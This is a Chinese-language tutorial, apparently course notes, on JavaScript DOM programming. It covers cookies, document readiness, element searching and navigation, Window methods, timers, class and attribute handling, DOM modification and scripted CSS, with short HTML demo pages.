expires=date 设置cookie的有效期,用的是GMT格式的日期,如果没有指定则cookie会在对话结束时过期
secure 只有在安全(HTTPS)连接时才会发送cookie
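由于document.cookie返回的是以分号间隔的name=value串,实际使用中常需要把它解析成名值对。下面是一个不依赖浏览器环境的解析函数草图(parseCookies这个函数名是为演示而取的):

```javascript
// 把"name=value; name2=value2"形式的cookie串解析成对象
function parseCookies(cookieString) {
    var result = {};
    if (cookieString === "") {
        return result;                       // 没有cookie时返回空对象
    }
    var pairs = cookieString.split("; ");    // 多个cookie之间以分号加空格间隔
    for (var i = 0; i < pairs.length; i++) {
        var eq = pairs[i].indexOf("=");      // 只按第一个等号切分,值里允许出现等号
        var name = pairs[i].substring(0, eq);
        var value = pairs[i].substring(eq + 1);
        result[name] = value;
    }
    return result;
}

// 在浏览器里可写成 parseCookies(document.cookie),这里用一个示例串代替
var cookies = parseCookies("Cookie_1=Value_1; Cookie_2=Updated_2");
console.log(cookies.Cookie_1);   // "Value_1"
console.log(cookies.Cookie_2);   // "Updated_2"
```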
Chap3-40.html
<body><p id="cookiedata"></p><button id="write">Add Cookie</button>
<button id="update">Update Cookie</button><button id="read">Read Cookie</button>
<button id="maxage">max-age</button>
<script>
var cookieCount=0;
document.getElementById("update").onclick=function () {
document.cookie="Cookie_"+cookieCount+"=Updated_"+cookieCount;
readCookies();
}
document.getElementById("write").onclick=function () {
cookieCount++;
document.cookie="Cookie_"+cookieCount+"=Value_"+cookieCount;
readCookies();
}
document.getElementById("read").onclick=function () {
readCookies();
}
document.getElementById("maxage").onclick=function () {
document.cookie="Cookie_"+cookieCount+"=Updated_"+cookieCount+";max-age=5";
}
function readCookies() {
document.getElementById("cookiedata").innerHTML=document.cookie;
}
</script></body>
readyState属性
document.readyState属性提供了加载和解析HTML文档过程中当前处于哪个阶段的信息。在默认情况下,浏览器会在遇到文档里的script元素时立即开始执行脚本,但你可以使用defer属性推迟脚本的执行。
readyState 说明
loading 浏览器正在加载和处理此文档
interactive 文档已被解析,但浏览器还在加载其中链接的资源(图像和媒体文件等)
complete 文档已被解析,所有的资源也已加载完毕
Chap3-41.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-41</title>
</head>
<body>
<script>
document.onreadystatechange=function () {
if(document.readyState=="interactive"){
document.getElementById("pressme").onclick=function () {
document.getElementById("results").innerHTML="Button Pressed";
}
}
}
</script>
<button id="pressme">Press Me</button>
<p id="results"></p>
</body>
</html>
使用属性获取HTML元素对象
属性 说明
activeElement 返回一个代表当前带有键盘焦点元素的对象
body 返回一个代表body元素的对象
embeds、plugins 返回所有代表embed元素的对象
forms 返回所有代表form元素的对象
head 返回一个代表head元素的对象
images 返回所有代表img元素的对象
links 返回所有代表文档里具备href属性的a和area元素的对象
scripts 返回所有代表script元素的对象
Chap3-42.html
namedItem方法会返回集合里带有指定id或name属性值的项目。
<head>
<style>
div{border:medium black double;}
p{font-size: x-large;}
</style>
</head>
<body>
<div id="results"></div>
<img id="apple" src="pic/apple.jpg" height="100">
<p>I like apples</p>
<img id="sun" src="pic/sun.jpg" height="100">
<p>I love sun</p>
<script>
var resultsElement=document.getElementById("results");
var elems=document.images;
for(var i=0;i<elems.length;i++){
resultsElement.innerHTML+="Image Elements: "+elems[i].id+"<br>";
}
var srcValue=elems.namedItem("apple").src;
resultsElement.innerHTML+="Src for apple element is: "+srcValue+"<br>";
</script>
</body>
搜索元素
属性 说明
getElementById(id) 返回带有指定id值的元素
getElementsByClassName(class) 返回带有指定class值的元素
getElementsByName(name) 返回带有指定name值的元素
getElementsByTagName(tag) 返回指定类型的元素
querySelector(selector) 返回匹配指定CSS选择器的第一个元素
querySelectorAll(selector) 返回匹配指定CSS选择器的所有元素
Chap3-43.html
这个例子中的选择器会匹配所有的p元素和id值为apple的img元素。
<head><style>p{font-size: x-large;color: white;background-color: grey}
div{font-size: x-large;border: medium double black} </style></head>
<body>
<div id="results"></div>
<img id="apple" class="pictures" name="myapple" src="pic/apple.jpg" height="100">
<p>I like apples</p>
<img id="sun" class="pictures" src="pic/sun.jpg" height="100">
<p>I love sun</p>
<script>
var resultsElement=document.getElementById("results");
var pElems=document.getElementsByTagName("p");
resultsElement.innerHTML+="There are "+pElems.length+" p elements. <br>";
var imgElems=document.getElementsByClassName("pictures");
resultsElement.innerHTML+="There are "+imgElems.length+" elements in the pictures class. <br>";
var nameElems=document.getElementsByName("myapple");
resultsElement.innerHTML+="There are "+nameElems.length+" elements with the name 'myapple'. <br>";
var cssElems=document.querySelectorAll("p,img#apple");
resultsElement.innerHTML+="The selector matched "+cssElems.length+" elements. <br>";
</script>
</body>
合并进行链式搜索
DOM的一个实用功能是几乎所有Document对象实现的搜索方法同时也能被HTMLElement对象实现,从而可以合并进行链式搜索。唯一的例外是getElementById方法,只有Document对象才能使用它。
Chap3-44.html
<head><style>p{font-size: x-large;color: white;background-color: grey}
div{font-size: x-large;border: medium double black}
span{font-size: x-large;display: block;height: 100px}
.s1{display: inline-block} </style></head>
<body>
<div id="results"></div>
<p id="tblock">
<span><img id="apple" src="pic/apple.jpg" height="100"></span>
<span>I like <span class="s1" style="color: red">apples</span> and <span class="s1" style="color: yellow">bananas</span> </span>
<span><img id="sun" src="pic/sun.jpg" height="100"></span>
<span>I love sun</span>
</p>
<script>
var resultsElement=document.getElementById("results");
var spanelems=document.getElementById("tblock").getElementsByTagName("span");
resultsElement.innerHTML+="There are "+spanelems.length+" span elements. <br>";
var imgElems=document.getElementById("tblock").querySelectorAll("img");
resultsElement.innerHTML+="There are "+imgElems.length+" img elements. <br>";
var s1elems=document.getElementById("tblock").querySelectorAll("#tblock>span");
resultsElement.innerHTML+="There are "+s1elems.length+" span (not s1) elements. <br>";
</script>
</body>
在DOM树里导航
另一种搜索元素的方法是将DOM视为一棵树,然后在它的层级结构里导航。
navigation属性 说明
childNodes 返回子元素组
firstChild 返回第一个子元素
hasChildNodes() 如果当前元素有子元素就返回true
lastChild 返回倒数第一个子元素
nextSibling 返回定义在当前元素之后的兄弟元素
parentNode 返回父元素
previousSibling 返回定义在当前元素之前的兄弟元素
Chap3-45.html
<head>
<meta charset="UTF-8">
<title>chap3-45</title>
<style>
p{font-size: x-large;}
div{font-size: x-large;border: medium double black}
</style>
</head>
<body id="mybody">
<div id="results"></div>
<p id="pApple"><img id="apple" src="pic/apple.jpg" height="100"></p>
<p id="pFruits">I like apples and bananas</p>
<p id="pSun"><img id="sun" src="pic/sun.jpg" height="100"></p>
<p id="pLove">I love sun</p>
<p id="pButton">
<button id="parent">Parent</button>
<button id="child">First Child</button>
<button id="prev">Prev Sibling</button>
<button id="next">Next Sibling</button>
</p>
<script>
var resultsElement=document.getElementById("results");
var element=document.body;
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=handleButtonClick;
}
processNewElement(element);
function handleButtonClick(e) {
if(element.style){
element.style.backgroundColor="white";
}
if(e.target.id=="parent" && element!=document.body){
element=element.parentNode;
}else if(e.target.id=="child" && element.hasChildNodes()){
element=element.firstChild;
}else if(e.target.id=="prev" && element.previousSibling){
element=element.previousSibling;
}else if(e.target.id=="next" && element.nextSibling){
element=element.nextSibling;
}
processNewElement(element);
if(element.style){
element.style.backgroundColor="lightgrey";
}
}
function processNewElement(elem) {
resultsElement.innerHTML="Element type: "+elem+"<br>";
resultsElement.innerHTML+="Element id: "+elem.id+"<br>";
resultsElement.innerHTML+="Has child nodes: "+elem.hasChildNodes()+"<br>";
if(elem.previousSibling){
resultsElement.innerHTML+="Prev sibling is: "+elem.previousSibling+"<br>";
}else {
resultsElement.innerHTML+="No prev sibling<br>";
}
if(elem.nextSibling){
resultsElement.innerHTML+="Next sibling is: "+elem.nextSibling+"<br>";
}else {
resultsElement.innerHTML+="No next sibling<br>";
}
}
</script>
</body>
Window对象
问题 解决方案
获取一个Window对象 使用document.defaultView或全局变量window
获取某个窗口的信息 使用window的信息性属性
与窗口进行交互 使用Window对象定义的方法
用模式对话框窗口提示用户 在某个Window对象上使用alert、confirm、prompt或showModalDialog方法
对浏览器历史执行简单的操作 对Window.history属性返回的History对象使用back、forward或go方法
操控浏览器历史 对Window.history属性返回的History对象使用pushState或replaceState方法
向运行在另一个文档中的脚本发送消息 使用跨文档消息传递功能
设置一次性或重复性计时器 在Window对象上使用setInterval、setTimeout、clearInterval和clearTimeout方法
获取Window对象
可以用两种方式获得Window对象:
• document对象的defaultView属性
• 全局变量window
Chap3-46.html
<head>
<meta charset="UTF-8">
<title>chap3-46</title>
<style>
td{font-size: x-large;border: solid black thin}
th{font-size: x-large;border: solid black thin}
table{border: solid black thin}
</style>
</head>
<body>
<table>
<tr><th>outerWidth:</th><td id="owidth"></td> </tr>
<tr><th>outerHeight:</th><td id="oheight"></td> </tr>
</table>
<script>
document.getElementById("owidth").innerHTML=window.outerWidth;
document.getElementById("oheight").innerHTML=document.defaultView.outerHeight;
</script>
</body>
获取窗口信息
窗口属性 说明
innerHeight 获取窗口内容区域的高度
innerWidth 获取窗口内容区域的宽度
outerHeight 获取窗口的高度,包括边框和菜单栏等
outerWidth 获取窗口的宽度,包括边框和菜单栏等
pageXOffset 获取窗口从左上角算起水平滚动过的像素数
pageYOffset 获取窗口从左上角算起垂直滚动过的像素数
screen 返回一个描述屏幕的Screen对象
screenLeft 获取从窗口左边缘到屏幕左边缘的像素数(不是所有浏览器都同时实现了这两个属性,或是以同样的方法计算这个值)
screenTop 获取从窗口上边缘到屏幕上边缘的像素数(不是所有浏览器都同时实现了这两个属性,或是以同样的方法计算这个值)
Chap3-46.html
<body>
<table>
<tr><th>outerWidth:</th><td id="owidth"></td> </tr>
<tr><th>outerHeight:</th><td id="oheight"></td> </tr>
<tr><th>innerWidth:</th><td id="iwidth"></td> </tr>
<tr><th>innerHeight:</th><td id="iheight"></td> </tr>
<tr><th>screenWidth:</th><td id="swidth"></td> </tr>
<tr><th>screenHeight:</th><td id="sheight"></td> </tr>
<tr><th>screenLeft:</th><td id="sleft"></td> </tr>
<tr><th>screenTop:</th><td id="stop"></td> </tr>
</table>
<script>
document.getElementById("owidth").innerHTML=window.outerWidth;
document.getElementById("oheight").innerHTML=document.defaultView.outerHeight;
document.getElementById("iwidth").innerHTML=window.innerWidth;
document.getElementById("iheight").innerHTML=window.innerHeight;
document.getElementById("swidth").innerHTML=window.screen.width;
document.getElementById("sheight").innerHTML=window.screen.height;
document.getElementById("sleft").innerHTML=window.screenLeft;
document.getElementById("stop").innerHTML=window.screenTop;
</script>
</body>
上表中使用了screen属性来获取一个Screen对象,这个对象提供了显示此窗口的屏幕信息,其属性有:
screen属性 说明
availHeight 屏幕上可供显示窗口部分的高度(排除工具栏和菜单栏之类)
availWidth 屏幕上可供显示窗口部分的宽度(排除工具栏和菜单栏之类)
colorDepth 屏幕的颜色深度
height 屏幕的高度
width 屏幕的宽度
与窗口进行交互
Window对象提供了一组方法,可以用它们与包含文档的窗口进行交互。
方法名称 说明
blur() 让窗口失去键盘焦点
close() 关闭窗口(不是所有浏览器都允许某个脚本关闭窗口)
focus() 让窗口获得键盘焦点
print() 提示用户打印页面
scrollBy(x,y) 让文档相对于当前位置进行滚动
scrollTo(x,y) 滚动到指定的位置
stop() 停止载入文档
Chap3-47.html
<head><style>p{width: 1000px;font-size: large} img{display: block} </style></head>
<body>
<p><button id="scroll">Scroll</button><button id="print">Print</button>
<button id="close">Close</button>
</p>
<p> In ecology, primary compounds as … <img src="pic/globalGPP.jpg">
Gross primary production (GPP) is…. <img src="pic/globalNPP.jpg">
</p>
</p>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="print"){
window.print();
}else if(e.target.id=="close"){
window.close();
}else{
window.scrollTo(0,400);
}
}
}
</script>
</body>
对用户进行提示
Window对象包含一组方法,能以不同的方式对用户进行提示。
方法名称 说明
alert(msg) 向用户显示一个对话框窗口并等候其被关闭
confirm(msg) 显示一个带有确认和取消提示的对话框窗口
prompt(msg,val) 显示对话框提示用户输入一个值
showModalDialog(url) 弹出一个窗口,显示指定的URL
showModalDialog方法已经被广告商们严重滥用了,很多浏览器对这个功能加以限制,仅允许用户事先许可的网站使用。
Chap3-48.html
<body>
<button id="alert">Alert</button>
<button id="confirm">Confirm</button>
<button id="prompt">Prompt</button>
<button id="modal">Modal Dialog</button>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="alert"){
window.alert("This is an alert");
}else if(e.target.id=="confirm"){
var confirmed=window.confirm("This is a confirm - do you want to proceed?");
alert("Confirmed? "+confirmed);
}else if(e.target.id=="prompt"){
var response=window.prompt("Enter a word","hello");
alert("The word was "+response);
}else if(e.target.id=="modal"){
window.showModalDialog("http://www.njfu.edu.cn");
}
}
}
</script>
</body>
使用浏览器历史
Window.history属性返回一个History对象,可以对浏览器历史进行一些基本的操作。
名称 说明
back() 在浏览器历史中后退一步
forward() 在浏览器历史中前进一步
go(index) 转到相对于当前文档的某个浏览历史位置。正值是前进,负值是后退
length 返回浏览历史中项目数量
Chap3-49.html
<body>
<button id="back">Back</button>
<button id="forward">Forward</button>
<button id="go">Go -1</button>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="back"){
window.history.back();
}else if(e.target.id=="forward"){
window.history.forward();
}else if(e.target.id=="go"){
window.history.go(-1);
}
}
}
document.writeln("<a href=\"chap3-47.html\">浏览历史中项目数:"+window.history.length+"</a>");
</script>
</body>
使用计时器
Window对象提供的计时方法有:
方法名称 说明
clearInterval(id) 撤销某个时间间隔计时器
clearTimeout(id) 撤销某个超时计时器
setInterval(function,time) 创建一个计时器,每隔time毫秒调用指定的函数
setTimeout(function,time) 创建一个计时器,等待time毫秒后调用指定的函数
setTimeout方法创建的计时器只执行一次指定函数,而setInterval方法会重复执行某个函数。这两个方法返回一个唯一的标识符,可以用clearInterval或clearTimeout方法来撤销计时器。
Chap3-50.html
<body>
<p id="msg"></p>
<button id="settime">Set Time</button>
<button id="cleartime">Clear Time</button>
<button id="setinterval">Set Interval</button>
<button id="clearinterval">Clear Interval</button>
<script>
var timeID,intervalID,count=0,buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="settime"){
timeID=window.setTimeout(function () {
displayMsg("Timeout Expired");
},5000);
displayMsg("Timeout Set");
}else if(e.target.id=="cleartime"){
window.clearTimeout(timeID);
displayMsg("Timeout Cleared");
}else if(e.target.id=="setinterval"){
intervalID=window.setInterval(function () {
displayMsg("Interval expired. Counter: "+count++);
},1000);
displayMsg("Interval Set");
}else if(e.target.id=="clearinterval"){
window.clearInterval(intervalID);
displayMsg("Interval Cleared");
}
}
}
function displayMsg(msg) {
document.getElementById("msg").innerHTML=msg;
}
</script>
</body>
使用DOM元素
问题 解决方案
获取元素的信息 使用HTMLElement的元数据属性
获取或设置包含某个元素所属全部类的单个字符串 使用className属性
检查或修改元素的各个类 使用classList属性
获取或设置元素的属性 使用attributes属性以及getAttribute、setAttribute、removeAttribute和hasAttribute方法
获取或设置元素的自定义属性 使用dataset属性
操作元素的文本内容 使用Text对象
创建或删除元素 使用以document.create开头的方法以及用于管理子元素的HTMLElement方法
复制元素 使用cloneNode方法
移动元素 使用appendChild方法
比较两个对象是否相同 使用isSameNode方法
比较两个元素是否相同 使用isEqualNode方法
直接操作HTML片段 使用innerHTML和outerHTML属性以及insertAdjacentHTML方法
在文本块里插入元素 使用splitText和appendChild方法
使用元素对象
HTMLElement对象提供了一组属性,可以用来读取和修改被代表元素的数据。
元素数据属性 说明
checked 获取或设置checked属性是否存在
classList 返回元素所属类的列表(DOMTokenList对象)
className 获取或设置元素所属的类列表(字符串)
dir 获取或设置dir属性的值
disabled 获取或设置disabled属性是否存在
hidden 获取或设置hidden属性是否存在
id 获取或设置id属性的值
lang 获取或设置lang属性的值
spellcheck 获取或设置spellcheck属性是否存在
tabIndex 获取或设置tabIndex属性的值
tagName 返回标签名(标识元素类型)
title 获取或设置title属性的值
Chap3-57.html
<style>.p1{font-size: x-large;border: medium double black}
</style>
<body>
<p id="block1" lang="en" dir="ltr" class="p1" title="favFruits">
I like <span id="apple">apples</span> and <span id="banana">banana</span>.
</p>
<pre id="results"></pre>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
results.innerHTML+="tag:"+elem.tagName+"\n";
results.innerHTML+="id:"+elem.id+"\n";
results.innerHTML+="dir:"+elem.dir+"\n";
results.innerHTML+="lang:"+elem.lang+"\n";
results.innerHTML+="hidden:"+elem.hidden+"\n";
results.innerHTML+="disabled:"+elem.disabled+"\n";
results.innerHTML+="classList:"+elem.classList+"\n";
results.innerHTML+="title:"+elem.title+"\n";
</script>
</body>
可以用两种方法处理某个元素所属的类:
• className属性:它返回一个包含元素全部类名的字符串,通过改变这个字符串的值,可以添加或移除类。
• classList属性:它返回一个DOMTokenList对象。
DOMTokenList对象成员 说明
add(class) 给元素添加指定的类
contains(class) 如果元素属于指定的类就返回true
length 返回元素所属类的数量
remove(class) 从元素上移除指定的类
toggle(class) 如果类不存在就添加它,如果存在就移除它
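toggle方法的语义可以用一个与DOM无关的小草图来说明:类不存在时添加并返回true,存在时移除并返回false(这里用Set模拟类列表,仅为示意,toggleClass是演示用的函数名):

```javascript
// 用Set模拟classList.toggle的语义:
// 类不存在时添加并返回true,存在时移除并返回false
function toggleClass(classSet, cls) {
    if (classSet.has(cls)) {
        classSet.delete(cls);
        return false;
    }
    classSet.add(cls);
    return true;
}

var classes = new Set(["fontSize", "big", "green"]);
console.log(toggleClass(classes, "small"));  // true,"small"被添加
console.log(toggleClass(classes, "small"));  // false,"small"被移除
console.log(classes.has("small"));           // false
```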
Chap3-57.html
<head>
<style>
.fontSize{font-size: x-large}
.border{border: medium double black}
.big{height: 100px;width: 600px;}
.small{height: 50px;width: 300px;}
.green{background-color: green;}
.blue{background-color: blue;}
.white{color: white}
.red{color: red}
pre{font-size: x-large;border: thin black solid}
</style>
</head>
<body>
<p id="block1" lang="en" dir="ltr" class="fontSize big green" title="favFruits">
I like <span id="apple">apples</span> and <span id="banana">banana</span>.
</p>
<pre id="results"></pre>
<button id="btn1">添加边框</button>
<button id="btn2">大小变化</button>
<button id="btn3">背景色变化</button>
<button id="btn4">前景色变化</button>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
var buttons=document.getElementsByTagName("button");
showElementProperties();
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="btn1"){
elem.className+=" border";
}else if(e.target.id=="btn2"){
elem.classList.toggle("small");
}else if(e.target.id=="btn3"){
elem.classList.toggle("blue");
}else if(e.target.id=="btn4"){
if(elem.classList.contains("white")){
elem.classList.remove("white");
elem.classList.add("red");
}else{
elem.classList.add("white");
elem.classList.remove("red");
}
}
showElementProperties();
}
}
function showElementProperties() {
results.innerHTML="tag:"+elem.tagName+"\n";
results.innerHTML+="id:"+elem.id+"\n";
results.innerHTML+="dir:"+elem.dir+"\n";
results.innerHTML+="lang:"+elem.lang+"\n";
results.innerHTML+="hidden:"+elem.hidden+"\n";
results.innerHTML+="disabled:"+elem.disabled+"\n";
results.innerHTML+="classList:"+elem.classList+"\n";
results.innerHTML+="title:"+elem.title+"\n";
}
</script>
</body>
使用元素属性
HTMLElement对象成员 说明
attributes 返回应用到元素上的属性
dataset 返回以data-开头的属性
getAttribute(name) 返回指定属性的值
hasAttribute(name) 如果元素带有指定的属性则返回true
removeAttribute(name) 从元素上移除指定属性
setAttribute(name,value) 应用一个指定名称和值的属性
Chap3-58.html
<head><style>.p1{font-size: x-large;border: medium double black}
pre{font-size: x-large;border: thin black solid}
</style></head>
<body>
<p id="block1" class="p1" lang="en-UK">
I like <span id="apple">apples</span> and <span id="banana">banana</span>.
</p>
<pre id="results"></pre>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
results.innerHTML="Element has data-fruit attribute: "+ elem.hasAttribute("data-fruit")+"\n"
results.innerHTML+="Adding data-fruit attribute\n";
elem.setAttribute("data-fruit","apples");
results.innerHTML+="data-fruit value is: "+elem.getAttribute("data-fruit")+"\n";
var attrs=elem.attributes;
for(var i=0;i<attrs.length;i++){
results.innerHTML+="Name: "+attrs[i].name+" value: "+attrs[i].value+"\n";
}
</script>
</body>
使用Text对象
元素的文本内容是由Text对象代表的,它在文档模型里表现为元素的子对象。当浏览器在文档模型里生成p元素时,元素自身会有一个HTMLElement对象,内容则会有一个Text对象。
<p id="block1">
I like <b>apples</b> and banana.
</p>
Text对象
Text对象成员 说明
appendData(string) 把指定字符串附加到文本块末尾
data 获取或设置文本
deleteData(offset,count) 从文本中移除字符串。第一个数字是偏移量,第二个是要移除的字符数量
insertData(offset,string) 在指定偏移量处插入指定字符串
length 返回字符的数量
replaceData(offset,count,string) 用指定字符串替换一段文本
replaceWholeText(string) 替换全部文本
splitText(number) 将现有的Text元素在指定偏移量处一分为二
substringData(offset,count) 返回文本的子串
wholeText 获取文本
Chap3-59.html
<body>
<p id="block1" style="font-size: x-large;border: medium double black">
I like <b id="b1">apples</b> and banana.
</p>
<pre id="results"></pre>
<button id="pressme">Press Me</button>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
document.getElementById("pressme").onclick=function () {
var textElem=elem.firstChild;
results.innerHTML="The element has "+textElem.length+" chars\n";
results.innerHTML+="The element is "+textElem.wholeText+"\n";
textElem.replaceData(5,1,"Do you");
var elemB=document.getElementById("b1");
var textB=elemB.firstChild;
textB.data="oranges";
}
</script>
</body>
修改DOM
DOM操纵成员 说明
appendChild(HTMLElement) 将指定元素添加为当前元素的子元素
cloneNode(boolean) 复制一个元素
compareDocumentPosition(HTMLElement) 判断一个元素的相对位置
innerHTML 获取或设置元素的内容
insertAdjacentHTML(pos,text) 相对于元素插入HTML
insertBefore(newElem,childElem) 在第二个子元素之前插入第一个元素
isEqualNode(HTMLElement) 判断指定元素是否与当前元素相同
isSameNode(HTMLElement) 判断指定元素是否就是当前元素
outerHTML 获取或设置某个元素的HTML和内容
removeChild(HTMLElement) 从当前元素上移除指定的子元素
replaceChild(HTMLElement, HTMLElement) 替换当前元素的某个子元素
createElement(tag) 创建一个属于指定标签类型的新HTMLElement对象
createTextNode(text) 创建一个带有指定内容的新Text对象
Chap3-60.html
<head>
<meta charset="UTF-8">
<title>chap3-60</title>
<style>
table{border: solid thin black;margin: 10px}
td{border:solid thin black;padding: 4px 5px}
</style>
</head>
<body>
<table>
<thead><tr><th>Name</th><th>Color</th></tr></thead>
<tbody id="fruitsBody">
<tr><td class="fruitName">Banana</td><td class="fruitColor">Yellow</td></tr>
<tr><td>Apple</td><td>Red</td></tr>
</tbody>
</table>
<button id="add">Add Element</button>
<button id="remove">Remove Element</button>
<button id="clone">Clone Element</button>
<script>
var tableBody=document.getElementById("fruitsBody");
document.getElementById("add").onclick=function () {
var row=tableBody.appendChild(document.createElement("tr"));
row.setAttribute("id","newrow");
var col=row.appendChild(document.createElement("td"));
col.appendChild(document.createTextNode("Plum"));
row.appendChild(document.createElement("td"))
.appendChild(document.createTextNode("Purple"));
}
document.getElementById("remove").onclick=function () {
var row=document.getElementById("newrow");
row.parentNode.removeChild(row);
}
document.getElementById("clone").onclick=function () {
var newElem=tableBody.getElementsByTagName("tr")[0].cloneNode(true);
newElem.getElementsByClassName("fruitName")[0].firstChild.data="pear";
newElem.getElementsByClassName("fruitColor")[0].firstChild.data="Yellow";
tableBody.appendChild(newElem);
}
</script>
</body>
脚本化CSS
行间样式
脚本化CSS就是使用javascript来操作CSS。引入CSS有3种方式:行间样式、外部样式和内部样式。
行间样式又叫内联样式,使用HTML的style属性进行设置:
<div id="test" style="height: 40px;width: 40px;background-color: blue;"></div>
element元素节点提供style属性,用来操作CSS行间样式,style属性指向cssStyleDeclaration对象。例如:
test.style.height = '30px';
如果一个CSS属性名包含一个或多个连字符,CSSStyleDeclaration属性名的格式应该是移除连字符,将每个连字符后面紧接着的字母大写:
<div id="test" style="height: 40px;width: 40px;background-color: blue;"></div>
console.log(test.style.backgroundColor)
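这条转换规则本身可以写成一个小函数(示意性的草图,toCamelCase是演示用的函数名):

```javascript
// 把"background-color"这样的CSS属性名转换为"backgroundColor"形式:
// 移除连字符,并把每个连字符后面的字母大写
function toCamelCase(propertyName) {
    return propertyName.replace(/-([a-z])/g, function (match, letter) {
        return letter.toUpperCase();
    });
}

console.log(toCamelCase("background-color"));   // "backgroundColor"
console.log(toCamelCase("border-top-width"));   // "borderTopWidth"
console.log(toCamelCase("height"));             // "height"(没有连字符时原样返回)
```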
• cssText属性:通过cssText属性能够访问到style特性中的CSS代码。在读模式下,cssText返回浏览器对style特性中CSS代码的内部表示;在写模式中,赋给cssText的值会重写整个style特性的值。
<div id="test" style="float: left">hello world</div>
<button id="pressme">Press Me</button>
<div id="results"></div>
<p>
<script>
var divTest=document.getElementById("test");
document.getElementById("results").innerHTML=divTest.style.cssText;
document.getElementById("pressme").onclick=function () {
divTest.style.cssText="font-size:x-large;float:right;background-color: blue;color: white";
}
</script>
• length属性:返回内联样式中的样式个数。
var divResults=document.getElementById("results");
divResults.innerHTML=divTest.style.length;
• item()方法:返回给定位置的CSS属性的名称。
var resFontsize=divTest.style.item(0);
• getPropertyValue()方法:返回给定属性的字符串值。
divResults.innerHTML=resFontsize+":"+divTest.style.getPropertyValue(resFontsize);
• getPropertyPriority()方法:如果给定的属性使用了!important设置,则返回important;否则返回空字符串。
<div id="results" style="height: 40px!important;width: 200px;background-color: lightgray"></div>
divResults.innerHTML=divResults.style.getPropertyPriority("height");
• setProperty()方法:将给定属性设置为相应的值,并加上优先级标志(important或一个空字符串),该方法无返回值。语法为:setProperty(propertyName,value,priority)
divResults.style.setProperty('height','20px','important');
• removeProperty()方法:从样式中删除给定属性,并返回被删除属性的属性值。
divResults.style.removeProperty('background-color');
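cssText的值是以分号间隔的“属性: 值”声明串,也可以解析成名值对,便于按名称检查某条内联样式(示意性的草图,与浏览器环境无关,parseCssText是演示用的函数名):

```javascript
// 把"height: 40px; width: 200px"形式的cssText解析成对象
function parseCssText(cssText) {
    var result = {};
    var declarations = cssText.split(";");
    for (var i = 0; i < declarations.length; i++) {
        var colon = declarations[i].indexOf(":");
        if (colon === -1) {
            continue;                 // 跳过空段(如末尾分号后的空串)
        }
        var name = declarations[i].substring(0, colon).trim();
        var value = declarations[i].substring(colon + 1).trim();
        result[name] = value;
    }
    return result;
}

// 在浏览器里可写成 parseCssText(divTest.style.cssText),这里用一个示例串代替
var styles = parseCssText("height: 40px; width: 200px; background-color: lightgray");
console.log(styles["height"]);             // "40px"
console.log(styles["background-color"]);   // "lightgray"
```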
Chap3-51.html
<body>
<div id="test" style="float: left">hello world</div>
<p>
<button id="cssText">cssText</button>
<button id="length">Length</button>
<button id="PropertyValue">getPropertyValue</button>
<button id="PropertyPriority">getPropertyPriority</button>
<button id="setProperty">setProperty</button>
<button id="removeProperty">removeProperty</button>
</p>
<div id="results" style="height: 40px!important;width: 200px;background-color: lightgray"></div>
<script>
var divTest=document.getElementById("test");
var divResults=document.getElementById("results");
divResults.innerHTML=divTest.style.cssText;
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="cssText"){
divTest.style.cssText="font-size:x-large;float:right;background-color: blue;color: white";
}else if(e.target.id=="length"){
divResults.innerHTML="length:"+divTest.style.length;
}else if(e.target.id=="PropertyValue"){
var resFontsize=divTest.style.item(0);
divResults.innerHTML=resFontsize+":"+divTest.style.getPropertyValue(resFontsize);
}else if(e.target.id=="PropertyPriority"){
divResults.innerHTML=divResults.style.getPropertyPriority("height");
}
else if(e.target.id=="setProperty"){
divResults.style.setProperty('height','20px','important');
}else if(e.target.id=="removeProperty"){
divResults.style.removeProperty('background-color');
}
}
}
</script>
</body>
查询计算样式
元素的渲染结果是多个CSS样式博弈后的最终结果,浏览器会从多个来源汇聚样式以计算出该用哪个值来显示某一元素。浏览器用于显示某个元素的CSS属性值集合被称为计算样式。
元素的计算样式(computedStyle)是一组在显示元素时实际使用的属性值,也是用一个 CSSStyleDeclaration对象来表示的,但计算样式是只读的,主要通过getComputedStyle()方法实现。语法为:
document.defaultView.getComputedStyle(element[,pseudo-element])
//或
window.getComputedStyle(element[,pseudo-element])
//或
getComputedStyle(element[,pseudo-element])
getComputedStyle()方法接收两个参数:要取得计算样式的元素和一个伪元素字符串。如果不需要伪元素信息,第二个参数可以是nullgetComputedStyle()方法返回一个CSSStyleDeclaration对象,其中包含当前元素的所有计算的样式。
Chap3-52.html
<style>
#test:before{
content: "getComputedStyle";
width: 250px;
display: inline-block;
color: blue;
}
</style>
<div id="test" style="font-size:x-large;width: 500px;border: double medium black">hello world</div>
<script>
var divTest=document.getElementById("test");
document.writeln("缺省伪元素:");
document.writeln(document.defaultView.getComputedStyle(divTest).width);
document.writeln(window.getComputedStyle(divTest).width);
document.writeln(getComputedStyle(divTest).width);
document.writeln("伪元素:");
document.writeln(getComputedStyle(divTest,":before").width);
</script>
在使用getComputedStyle()方法的过程中,有如下注意事项:
• 对于fontbackgroundborder等复合样式,各浏览器处理不一样。chrome会返回整个复合样式,而IE9+、firefox和safari则输出空字符串''
document.writeln(getComputedStyle(divTest).font);
• 不论以什么格式设置颜色,浏览器都以rgb()rgba()的形式输出
document.writeln(getComputedStyle(divTest,":before").color);
• 在计算样式中,类似百分比等相对单位会转换为绝对值
#test:after{content: "!"; width: 1%; display: inline-block; color: blue;}
document.writeln(getComputedStyle(divTest,":after").width);
